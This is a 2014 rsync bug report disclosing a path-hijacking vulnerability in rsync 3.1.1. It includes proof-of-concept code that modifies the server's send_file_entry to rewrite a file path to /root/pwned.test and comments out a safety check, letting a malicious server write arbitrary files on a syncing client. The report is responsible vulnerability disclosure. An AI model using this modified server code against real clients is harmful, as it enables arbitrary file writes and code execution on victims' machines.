[Bug 10936] New: Rsync path hijacking attack vulnerability
samba-bugs at samba.org
samba-bugs at samba.org
Thu Nov 13 23:51:40 MST 2014
https://bugzilla.samba.org/show_bug.cgi?id=10936
Bug ID: 10936
Summary: Rsync path hijacking attack vulnerability
Product: rsync
Version: 3.1.1
Hardware: All
OS: All
Status: NEW
Severity: critical
Priority: P5
Component: core
Assignee: wayned at samba.org
Reporter: gaojianfeng at baidu.com
QA Contact: rsync-qa at samba.org
Created attachment 10433
--> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit
Rsync path hijacking attack vulnerability.pdf (Detailed documentation)
Hi all:
In newest version rsync,Baidu Security Team found a vulnerability which is
similar to wget ftp CVE-2014-4877
(http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877).When a
clientuses parameter -a to synchronize files of the server-side(default), for
example:
rsync -avzP 127.0.0.1::share /tmp/share
Rsync recursive synchronous all files,An attacker can hijack the file path by
modifying the code of the server-side,allows remote servers to write to
arbitrary files, and consequently execute arbitrary code .
Vulnerability Details :
First I shared in the Rsync folder to write the following documents
[root at pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt
drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
[root at pentest rsync]# cd truedir/
[root at pentest truedir]# ls
pwned
[root at pentest truedir]# cat pwned
rsync test
[root at pentest truedir]#
Next I modify the server to send the file code,in the process of
synchronizing,the path of file
"pwned" can be blocked and changed into any path .
file: flist.c line:394
static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
const char *symlink_name, int symlink_len,
#endif
int ndx, int first_ndx)
{
if(strcmp(fname,"turedir/pwned") == 0){
fname="/root/pwned.test"; //Arbitrarily path
}
Then, verification occurs in the server-side and says “received request to
transfer non-regular file
/root/pwned.test 7 [sender]”,But as an attacker, the code of the server-side
can be arbitrarily
controlled,Shielding the following code.
file:rsync.c line:405
/*
if (iflags & ITEM_TRANSFER) {
int i = ndx - cur_flist->ndx_start;
if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
rprintf(FERROR,
"received request to transfer non-regular file: %d [%s]\n",
ndx, who_am_i());
exit_cleanup(RERR_PROTOCOL);
}
}
*/
The file "pwned" will be downloaded into forged path(/root/pwned.test).
--
You are receiving this mail because:
You are the QA Contact for the bug.
More information about the rsync
mailing list